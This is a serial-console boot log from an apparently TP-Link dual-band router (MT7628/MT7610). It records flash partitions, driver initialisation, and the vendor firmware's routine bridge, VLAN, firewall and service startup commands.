mtd .name = raspi, .size = 0x00800000 (8M) .erasesize = 0x00010000 (64K) .numeraseregions = 0
Creating 7 MTD partitions on "raspi":
0x000000000000-0x000000020000 : "boot"
0x000000020000-0x000000160000 : "kernel"
0x000000160000-0x0000007c0000 : "rootfs"
mtd: partition "rootfs" set to be root filesystem
0x0000007c0000-0x0000007d0000 : "config"
0x0000007d0000-0x0000007e0000 : "romfile"
0x0000007e0000-0x0000007f0000 : "rom"
0x0000007f0000-0x000000800000 : "radio"
Register flash device:flash0
PPP generic driver version 2.4.2
PPP MPPE Compression module registered
NET: Registered protocol family 24
Mirror/redirect action on
u32 classifier
Actions configured
Netfilter messages via NETLINK v0.30.
nf_conntrack version 0.5.0 (954 buckets, 3816 max)
ip_tables: (C) 2000-2006 Netfilter Core Team, Type=Linux
TCP cubic registered
NET: Registered protocol family 10
ip6_tables: (C) 2000-2006 Netfilter Core Team
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Ebtables v2.0 registered
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 168k freed
starting pid 691, tty '': '/etc/init.d/rcS'
rdm_major = 253
SCSI subsystem initialized
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash( 7df100) ffffff98-ffffffda-ffffffc4-6e-00-fffffffc
GMAC1_MAC_ADRH -- : 0x000098da
GMAC1_MAC_ADRL -- : 0xc46e00fc
Ralink APSoC Ethernet Driver Initilization. v3.1 256 rx/tx descriptors allocated, mtu = 1500!
NAPI enable, Tx Ring = 256, Rx Ring = 256
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash( 7df100) ffffff98-ffffffda-ffffffc4-6e-00-fffffffc
GMAC1_MAC_ADRH -- : 0x000098da
GMAC1_MAC_ADRL -- : 0xc46e00fc
PROC INIT OK!
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
FM_OUT value: u4FmOut = 0(0x00000000)
FM_OUT value: u4FmOut = 125(0x0000007D)
FM detection done! loop = 1
SR calibration value u1SrCalVal = 7
rt3xxx-ehci rt3xxx-ehci: Ralink EHCI Host Controller
rt3xxx-ehci rt3xxx-ehci: new USB bus registered, assigned bus number 1
rt3xxx-ehci rt3xxx-ehci: irq 18, io mem 0x101c0000
rt3xxx-ehci rt3xxx-ehci: USB 0.0 started, EHCI 1.00
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
rt3xxx-ohci rt3xxx-ohci: RT3xxx OHCI Controller
rt3xxx-ohci rt3xxx-ohci: new USB bus registered, assigned bus number 2
rt3xxx-ohci rt3xxx-ohci: irq 18, io mem 0x101c1000
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 1 port detected
Initializing USB Mass Storage driver...
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
add domain:tplinkwifi.net
add domain:tplinklogin.net
tp_domain init ok
/etc/init.d/rcS: line 78: telnetd: not found
L2TP core driver, V2.0
PPPoL2TP kernel driver, V2.0
Set: phy[0].reg[0] = 3900
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
starting pid 778, tty '/dev/ttyS1': '/bin/sh'
~ # [ util_execSystem ] 139: ipt_init cmd is "/var/tmp/dconf/rc.router"
[ dm_readFile ] 2061: can not open xml file /var/tmp/pc/reduced_data_model.xml!, about to open file /etc/reduced_data_model.xml
spiflash_ioctl_read, Read from 0x007c0000 length 0x10000, ret 0, retlen 0x10000
spiflash_ioctl_read, Read from 0x007c0000 length 0xad26, ret 0, retlen 0xad26
===>Enter Routerspiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
mode
spiflash_ioctl_read, Read from 0x007df200 length 0x4, ret 0, retlen 0x4
spiflash_ioctl_read, Read from 0x007df300 length 0x4, ret 0, retlen 0x4
spiflash_ioctl_read, Read from 0x007df400 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x007df500 length 0x29, ret 0, retlen 0x29
spiflash_ioctl_read, Read from 0x007df600 length 0x21, ret 0, retlen 0x21
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x00020000 length 0x1d0, ret 0, retlen 0x1d0
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
sendto: No such file or directory
pid 777 send 2001 error
[ util_execSystem ] 139: oal_startDynDns cmd is "dyndns /var/tmp/dconf/dyndns.conf"
[ oal_sys_getOldTZInfo ] 519: Open TZ file error!
[ util_execSystem ] 139: oal_sys_unsetTZ cmd is "echo "" > /etc/TZ"
[ util_execSystem ] 139: oal_startNoipDns cmd is "noipdns /var/tmp/dconf/noipdns.conf"
[ util_execSystem ] 139: oal_startCmxDns cmd is "cmxdns /var/tmp/dconf/cmxdns.conf"
ioctl: No such device
[ util_execSystem ] 139: oal_br_addBridge cmd is "brctl addbr br0;brctl setfd br0 0;brctl stp br0 off"
[ util_execSystem ] 139: oal_ipt_addLanRules cmd is "iptables -t filter -A INPUT -i br+ -j ACCEPT
[ util_execSystem ] 139: oal_intf_setIntf cmd is "ifconfig br0 192.168.1.1 netmask 255.255.255.0 up"
[ util_execSystem ] 139: oal_util_setProcLanAddr cmd is "echo "br0 16885952," > /proc/net/conRaeth v3.1 (ntract_LocalAddrNAPI
[ util_exec,SkbRecycleSystem ] 139: o)
al_intf_enableIn
phy_tx_ring = 0x0318b000, tx_ring = 0xa318b000
tf cmd is "ifcon
phy_rx_ring0 = 0x0318c000, rx_ring0 = 0xa318c000
fig eth0 up"
[fe_sw_init:5185]rt305x_esw_init.
disable switch phyport...
GMAC1_MAC_ADRH -- : 0x000098da
GMAC1_MAC_ADRL -- : 0xc46e00fc
RT305x_ESW: Link Status Changed
[ rsl_getUnusedVlan ] 1042: GET UNUSED VLAN TAG 1 : [3]
[ rsl_getUnusedVlan ] 1042: GET UNUSED VLAN TAG 2 : [4]
[ rsl_getUnusedVlan ] 1042: GET UNUSED VLAN TAG 3 : [5]
[ rsl_getUnusedVlan ] 1042: GET UNUSED VLAN TAG 4 : [6]
[ util_execSystem ] 139: oal_addVlanTagIntf cmd is "vconfig add eth0 3"
[ util_execSystem ] 139: oal_intf_enableIntf cmd is "ifconfig eth0.3 up"
set if eth0.3 to *not wan dev
[ util_execSystem ] 139: oal_addVlanTagIntf cmd is "vconfig add eth0 4"
[ util_execSystem ] 139: oal_intf_enableIntf cmd is "ifconfig eth0.4 up"
set if eth0.4 to *not wan dev
[ util_execSystem ] 139: oal_addVlanTagIntf cmd is "vconfig add eth0 5"
[ util_execSystem ] 139: oal_intf_enableIntf cmd is "ifconfig eth0.5 up"
set if eth0.5 to *not wan dev
[ util_execSystem ] 139: oal_addVlanTagIntf cmd is "vconfig add eth0 6"
[ util_execSystem ] 139: oal_intf_enableIntf cmd is "ifconfig eth0.6 up"
set if eth0.6 to *not wan dev
[ util_execSystem ] 139: oal_addVlanTagIntf cmd is "vconfig add eth0 2"
[ util_execSystem ] 139: oal_intf_enableIntdevice eth0.3 entered promiscuous mode
f cmd is "ifconfdevice eth0 entered promiscuous mode
ig eth0.2 up"
br0: port 1(eth0.3) entering forwarding state
set if eth0.2 tbr0: port 1(eth0.3) entering forwarding state
o wan dev
[ vlan_addLanPortsIntoBridge ] 574: add lan Port 255 from br0
[ utidevice eth0.4 entered promiscuous mode
l_execSystem ] 1br0: port 2(eth0.4) entering forwarding state
39: oal_br_addIbr0: port 2(eth0.4) entering forwarding state
ntfIntoBridge cmd is "brctl addif br0 eth0.3"
[ util_execSystem ] 139: oal_bdevice eth0.5 entered promiscuous mode
r_addIntfIntoBribr0: port 3(eth0.5) entering forwarding state
dge cmd is "brctbr0: port 3(eth0.5) entering forwarding state
l addif br0 eth0.4"
[ util_execSystem ] 139: oal_br_addIntfIntoBridge cmd isdevice eth0.6 entered promiscuous mode
"brctl addif brbr0: port 4(eth0.6) entering forwarding state
0 eth0.5"
[ ubr0: port 4(eth0.6) entering forwarding state
til_execSystem ] 139: oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.6"
[ util_execSystem ] 139: rsl_initIPv6CfgObj cmd is "echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6"
[ util_execSystem ] 139: oal_eth_setIGMPSnoopParam cmd is "for i in /sys/devices/virtual/net/*/bridge/multicast_snooping;do echo 1 > $i ; done"
[ util_execSystem ] 139: oal_wlan_ra_setCountryRegion cmd is "cp /etc/SingleSKU_CE.dat /var/Wireless/RT2860AP/SingleSKU.dat"
[ util_execSystem ] 139: oal_wlan_ra_setCountryRegion cmd is "iwpriv ra0 set CountryRegion=1"
ra0 no private ioctls.
[ util_execSystem ] 166: execute ok, exit status = 255
[ util_execSystem ] 139: oal_wlan_ra_loadDriver cmd is "insmod /lib/modules/kmdir/kernel/drivers/net/wireless/mt_wifi_ap/mt_wifi.ko"
ADDRCONF(NETDEV_CHANGE): eth0.4: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.5: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.6: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.2: link becomes ready
=== pAd = c0988000, size = 1493064 ===
<-- RTMPAllocTxRxRingMemory, Status=0, ErrorValue=0x
<-- RTMPAllocAdapterBlock, Status=0
RtmpChipOpsHook(492): Not support for HIF_MT yet!
mt7628_init()-->
mt7628_init(FW(8a00), HW(8a01), CHIPID(7628))
e2.bin mt7628_init(1156)::(2), pChipCap->fw_len(64560)
mt_bcn_buf_init(218): Not support for HIF_MT yet!
<--mt7628_init()
[ util_execSystem ] 139: oal_wlan_ra_initWlan cmd is "ifconfig ra0 up"
TX_BCN DESC a277c000 size = 320
RX[0] DESC a2780000 size = 2048
RX[1] DESC a2781000 size = 2048
RT_CfgSetApcliMacAddress : invalid mac setting
cfg_mode=9
cfg_mode=9
wmode_band_equal(): Band Equal!
AndesSendCmdMsg: Could not send in band command due to diable fRTMP_ADAPTER_MCU_SEND_IN_BAND_CMD
APSDCapable[0]=0
APSDCapable[1]=0
APSDCapable[2]=0
APSDCapable[3]=0
APSDCapable[4]=0
APSDCapable[5]=0
APSDCapable[6]=0
APSDCapable[7]=0
APSDCapable[8]=0
APSDCapable[9]=0
APSDCapable[10]=0
APSDCapable[11]=0
APSDCapable[12]=0
APSDCapable[13]=0
APSDCapable[14]=0
APSDCapable[15]=0
default ApCliAPSDCapable[0]=0
Key1Str is Invalid key length(0) or Type(0)
Key1Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
WscKeyASCII=8
WscKeyASCII=8
[RTMPReadParametersHook:297]wifi read profile faild.
load fw image from fw_header_image
AndesMTLoadFwMethod1(2263)::pChipCap->fw_len(64560)
FW Version:1
FW Build Date:20161213152835
CmdAddressLenReq:(ret = 0)
CmdFwStartReq: override = 1, address = 1048576
CmdStartDLRsp: WiFI FW Download Success
MtAsicDMASchedulerInit(): DMA Scheduler Mode=0(LMAC)
efuse_probe: efuse = 10000002
RtmpChipOpsEepromHook::e2p_type=2, inf_Type=4
RtmpEepromGetDefault::e2p_dafault=2
RtmpChipOpsEepromHook: E2P type(2), E2pAccessMode = 2, E2P default = 2
NVM is FLASH mode
1. Phy Mode = 14
exec!
spiflash_ioctl_read, Read from 0x007f0000 length 0x400, ret 0, retlen 0x400
eeFlashId = 0x7628!
Country Region from e2p = ffff
tssi_1_target_pwr_g_band = 32
2. Phy Mode = 14
3. Phy Mode = 14
NICInitPwrPinCfg(11): Not support for HIF_MT yet!
NICInitializeAsic(651): Not support rtmp_mac_sys_reset () for HIF_MT yet!
mt_mac_init()-->
MtAsicInitMac()-->
mt7628_init_mac_cr()-->
MtAsicSetMacMaxLen(1277): Set the Max RxPktLen=450!
<--mt_mac_init()
WTBL Segment 1 info:
MemBaseAddr/FID:0x28000/0
EntrySize/Cnt:32/128
WTBL Segment 2 info:
MemBaseAddr/FID:0x40000/0
EntrySize/Cnt:64/128
WTBL Segment 3 info:
MemBaseAddr/FID:0x42000/64
EntrySize/Cnt:64/128
WTBL Segment 4 info:
MemBaseAddr/FID:0x44000/128
EntrySize/Cnt:32/128
AntCfgInit(2946): Not support for HIF_MT yet!
MCS Set = ff ff 00 00 01
MtAsicSetChBusyStat(861): Not support for HIF_MT yet!
[PMF]ap_pmf_init:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[PMF]RTMPMakeRsnIeCap: RSNIE Capability MFPC=0, MFPR=0
[PMF]ap_pmf_init:: apidx=1, MFPC=0, MFPR=0, SHA256=0
MtAsicSetRalinkBurstMode(3048): Not support for HIF_MT yet!
MtAsicSetPiggyBack(796): Not support for HIF_MT yet!
FW LOG: !!!! Pass, dont need recal (total fail[0])
reload DPD from flash , 0x9F = [ca00] doReload bit7[0]
CmdLoadDPDDataFromFlash: Channel = 11, DoReload = 0
MtAsicSetTxPreamble(3027): Not support for HIF_MT yet!
CmdSlotTimeSet:(ret = 0)
MtAsicAddSharedKeyEntry(1344): Not support for HIF_MT yet!
MtAsicSetPreTbtt(): bss_idx=0, PreTBTT timeout = 0xf0
ap_ftkd> Initialize FT KDP Module...
Main bssid = 98:da:c4:6e:00:fc
<==== rt28xx_init, Status=0
@@@ ed_monitor_init : ===>
@@@ ed_monitor_init : <===
mt7628_set_ed_cca: TURN ON EDCCA mac 0x10618 = 0xd7c87d0f, EDCCA_Status=1
WiFi Startup Cost (ra0): 0.748s
[ util_execSystem ] 139: oal_wlan_ra_initWlan cmd is "echo 1 > /proc/tplink/led_wlan_24G"
[ util_execSystem ] 139: oal_wlan_ra_setStaNum cmd is "iwpriv ra0 set MaxStaNum=32"
[ util_execSystem ] 139: device ra0 entered promiscuous mode
oal_br_addIntfInbr0: port 5(ra0) entering forwarding state
toBridge cmd is br0: port 5(ra0) entering forwarding state
"brctl addif br0 ra0"
[ util_execSystem ] 139: oal_br_addIntfIntoBridge cmd device apcli0 entered promiscuous mode
is "brctl addif br0 apcli0"
[ util_execSystem ] 139: oal_br_addIntfIntoBridgdevice ra1 entered promiscuous mode
e cmd is "brctl addif br0 ra1"
[ util_execSyste
====
@@@ ed_status_read: EDCCA TH - H
pAd->ed_trigger_cnt : 0 > 20 || pAd->ed_big_rssi_stat : 0 < 50
====
m ] 139: oal_wlan_ra_initEnd cmd is "wlNetlinkTspiflash_ioctl_read, Read from 0x007f0000 length 0x2, ret 0, retlen 0x2
ool &"
[ util_execSystem ] 139: oal_wlan_ra_initEnd cmd is "killall -q wscd"
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_wlan_ra_initEnd cmd is "wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/ &"
[ util_execSystem ] 139: rsl_initLanWlanObj cmd is "echo 0 > /proc/tplink/wl_mode"
[ util_execSystem ] 139: oal_wlan_ra_setCountryRegion cmd is "cp /etc/SingleSKU_5G_CE.dat /var/Wireless/RT2860AP/SingleSKU_5G.dat"
WLAN-Start wlNetlinkTool
Waiting for Wireless Events from interfaces...
swWlanChkAhbErr: netlink to do
[ util_execSystem ] 139: oal_wlan_ra_setCountryRegion cmd is "iwpriv rai0 set CountryRegionABand=1"
rai0 no private ioctls.
[ util_execSystem ] 166: execute ok, exit status = 255
[ util_execSystem ] 139: oal_wlan_ra_loadDriver cmd is "insmod /lib/modules/kmdir/kernel/drivers/net/wireless/MT7610_ap/MT7610_ap.ko"
wscd: SSDP UDP PORT = 1900
=== pAd = c1002000, size = 1368440 ===
<-- RTMPAllocTxRxRingMemory, Status=0
<-- RTMPAllocAdapterBlock, Status=0
device_id =0x7650
Read eeprom data from flash into memory!
spiflash_ioctl_read, Read from 0x007f8000 length 0x200, ret 0, retlen 0x200
==>MT76x0_WLAN_ChipOnOff(): OnOff:1, pAd->WlanFunCtrl:0x0, Reg-WlanFunCtrl=0xff000002
MACVersion = 0x76502000
[ util_execSystem ] 139: oal_wlan_ra_initWlan cmd is "ifconfig rai0 up"
load fw spent 16ms
RX DESC a2078000 size = 4096
RX1 DESC a2079000 size = 4096
cfg_mode=14
cfg_mode=14
wmode_band_equal(): Band Not Equal!
1. Phy Mode = 49
2. Phy Mode = 49
ERROR!!! E2PROM: WRONG VERSION 0x2, should be 1
ext_pa_current_setting = 1
MT76x0_TssiTableAdjust: upper_bound = 0x7F decimal: 127
MT76x0_TssiTableAdjust: lower_bound = 0xFFFFFF80 decimal: -128
*** MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -15 -8 -3 * 0 * 2 12 21 127 127 127 127, offset=-10, tuning=1
MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -25 -18 -13 * -10 * -8 2 11 117 117 117 117, offset=-10, tuning=1
mp_temperature=0xfffffff6, step = +0
MT76x0_TssiTableAdjust: upper_bound = 0x7F decimal: 127
MT76x0_TssiTableAdjust: lower_bound = 0xFFFFFF80 decimal: -128
*** MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -18 -11 -4 * -10 * 2 21 127 127 127 127 127, offset=-10, tuning=1
MT76x0_TssiTableAdjust: A Tssi[-7 .. +7] = -128 -128 -128 -128 -28 -21 -14 * -10 * -8 11 117 117 117 117 117, offset=-10, tuning=1
mp_temperature=0xfffffff6, step = +0
3. Phy Mode = 49
AntCfgInit: primary/secondary ant 0/1
ChipStructAssign(): RALINK6590 hook !
bAutoTxAgcG = 1
MCS Set = ff 00 00 00 01
MT76x0_ChipBBPAdjust():rf_bw=2, ext_ch=1, PrimCh=36, HT-CentCh=38, VHT-CentCh=42
APStartUp(): AP Set CentralFreq at 42(Prim=36, HT-CentCh=38, VHT-CentCh=42, BBP_BW=2)
@@@ ed_monitor_init : ===>
@@@ ed_monitor_init : <===
Main bssid = 98:da:c4:6e:00:fb
<==== rt28xx_init, Status=0
0x1300 = 00064300
RTMPDrvOpen(1):Check if PDMA is idle!
RTMPDrvOpen(2):Check if PDMA is idle!
[ util_execSystem ] 139: oal_wlan_ra_initWlan cmd is "echo 1 > /proc/tplink/led_wlan_5G"
[ util_execSystem ] 139: oal_wlan_ra_setStaNum cmd is "iwpriv rai0 set MaxStaNum=32"
[ util_execSystem ] 139: device rai0 entered promiscuous mode
oal_br_addIntfInbr0: port 8(rai0) entering forwarding state
toBridge cmd is br0: port 8(rai0) entering forwarding state
"brctl addif br0 rai0"
[ util_execSystem ] 139: oal_br_addIntfIntoBridge cmddevice apclii0 entered promiscuous mode
is "brctl addif br0 apclii0"
[ util_execSystem ] 139: oal_br_addIntfIntoBridevice rai1 entered promiscuous mode
dge cmd is "brctl addif br0 rai1"
wlNetlinkTool isspiflash_ioctl_read, Read from 0x007f8000 length 0x2, ret 0, retlen 0x2
already there.
[ util_execSystem ] 139: oal_wlan_ra_initEnd cmd is "killall -q wscd_5G"
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_wlan_ra_initEnd cmd is "wscd_5G -i rai0 -m 1 -w /var/tmp/wsc_upnp_5G/ &"
[ util_execSystem ] 139: rsl_initLanWlanObj cmd is "echo 0 > /proc/tplink/wl_mode"
wscd: SSDP UDP PORT = 1900
sendto: No such file or directory
pid 777 send 2030 error
sendto: No such file or directory
pid 777 send 2004 error
[ util_execSystem ] 139: oal_startDhcps cmd is "dhcpd /var/tmp/dconf/udhcpd.conf"
[ util_execSystem ] 139: oal_lan6_startDhcp6s cmd is "dhcp6s -c /var/tmp/dconf/dhcp6s_br0.conf -P /var/run/dhcp6s_br0.pid br0 &"
[ util_execSystem ] 139: oal_lan6_startRadvd cmd is "radvd -C /var/tmp/dconf/radvd_br0.conf -p /var/run/radvd_br0.pid &"
[ util_execSystem ] 139: oal_br_delIntfFromBridge cmd is "brctl delif br0 eth0.2"
mldProxy# file: src/mld_ifinfo.c;line: 102; error = No such file or directory
mldProxy# Err: get LLA failed
iptables: Bad rule (does a matching rule exist in that chain?).
brctl: bridge br0: Invalid argument
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_intf_setIfMac cmd is "ifconfig eth0.2 down"
[ util_execSystem ] 139: oal_intf_setIfMac cmd is "ifconfig eth0.2 hw ether 98:DA:C4:6E:00:FD up"
[ util_execSystem ] 139: oal_intf_enableIntf cmd is "ifconfig eth0.2 up"
radvd starting
[Jan 01 00:00:09] radvd: no linklocal address configured for br0
[Jan 01 00:00:09] radvd: error parsing or activating the config file: /var/tmp/dconf/radvd_br0.conf
[ rsl_initAppObj ] 787: ==> start dhcp client
[ util_execSystem ] 139: oal_rip_updateConfig cmd is "rm -f /var/tmp/dconf/zebra.conf"
[ util_execSystem ] 139: oal_rip_updateConfig cmd is "rm -f /var/tmp/dconf/ripd.conf"
[ util_execSystem ] 139: removeAllRIPIpTableRule cmd is "iptables -L INPUT -v --line-numbers > /var/iptable"
[ getPidFromPidFile ] 112: Cann't open file: /var/run/zebra.pid.
[ util_execSystem ] 139: controlRipProcess cmd is "zebra -d -f /var/tmp/dconf/zebra.conf"
[ getPidFromPidFile ] 112: Cann't open file: /var/run/ripd.pid.
[ util_execSystem ] 139: oal_ipt_fwDdos cmd is "iptables -D FORWARD -j FIREWALL_DDOS
"
iptables: No chain/target/match by that name.
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_ipt_forbidLanPing cmd is "iptables -t filter -D INPUT -i br+ -p icmp --icmp-type echo-request -j DROP
iptables -t filter -D FORWARD -i br+ -p icmp --icmp-type echo-request -j DROP
"
iptables: Bad rule (does a matching rule exist in that chain?).
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_ddos_delPingRule cmd is "iptables -t filter -D INPUT ! -i br+ -p icmp --icmp-type echo-request -j ACCEPT
"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_ipt_setDDoSRules cmd is "iptables -F FIREWALL_DDOS"
[ util_execSystem ] 139: ddos_clearAll cmd is "rm -f /var/tmp/dosHost"
[ util_execSystem ] 139: oal_initFirewallObj cmd is "ebtables -N FIREWALL"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -F"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -X"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -P INPUT ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -P FORWARD DROP"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -P OUTPUT ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -N FIREWALL"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -N FWRULE"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -N SETMSS"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i lo -p ALL -j ACCEPT -m comment --comment "loop back""
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p tcp --dport 23 -j ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p tcp --dport 23 -j DROP"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p icmpv6 --icmpv6-type echo-request -j ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p icmpv6 --icmpv6-type echo-request -j DROP"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -i br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -o br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -j FIREWALL"
[ util_execSystem ] 139: oal_initIp6FirewallObj cmd is "ip6tables -I FORWARD 1 -j SETMSS"
[ util_execSystem ] 139: oal_fw6_setFwEnabeld cmd is "ip6tables -D FIREWALL -j ACCEPT"
ip6tables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_fw6_setFwEnabeld cmd is "ip6tables -F FIREWALL"
[ util_execSystem ] 139: oal_fw6_setFwEnabeld cmd is "ip6tables -A FIREWALL -j ACCEPT"
[ rsl_setStorageServiceObj ] 1024: mountFlag is 3,We start usb server
[ util_execSystem ] 139: oal_killDlnaMediaSeverProcess cmd is "killall ushare"
killall: ushare: no process killed
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_sys_unsetTZ cmd is "echo "" > /etc/TZ"
uShare (version 1.1a), a lightweight UPnP A/V and DLNA Media Server.
Benjamin Zores (C) 2005-2007, for GeeXboX Team.
See http://ushare.geexbox.org/ for updates.
[ util_execSystem ] 139: oal_ipt_setWanPort cmd is "iptables -t filter -D INPUT -p tcp --dport 21 -j ACCEPT"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_ipt_setWanPort cmd is "iptables -t nat -D PREROUTING -p tcp --dport 21 -j ACCEPT"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_startSamba cmd is "smbd -D"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_ftp.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_ftp.ko"
[ util_execSystem ] 139: oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH -p udp --dport 500 -j DROP"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_proto_gre.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_pptp.ko"
[ util_execSystem ] 139: oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH -p tcp --dport 1723 -j DROP"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH -p udp --dport 1701 -j DROP"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 166: execute ok, exit status = 1
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_tftp.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_tftp.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_h323.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_h323.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_sip.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_sip.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_rtsp.ko"
[ util_execSystem ] 139: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_rtsp.ko"
nf_nat_rtsp v0.6.21 loading
gpiomode1 55144444.
gpiomode2 00000445.
enable switch phyport...
Set: phy[0].reg[0] = 3900
[cmd_dutInit():1059] init shm
[tddp_taskEntry():151] tddp task start
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
[ util_execSystem ] 139: prepareDropbear cmd is "dropbearkey -t rsa -f /var/tmp/dropbear/dropbear_rsa_host_key"
Will output 1024 bit rsa secret key to '/var/tmp/dropbear/dropbear_rsa_host_key'
Generating key, this may take a while...
[ util_execSystem ] 139: prepareDropbear cmd is "dropbearkey -t dss -f /var/tmp/dropbear/dropbear_dss_host_key"
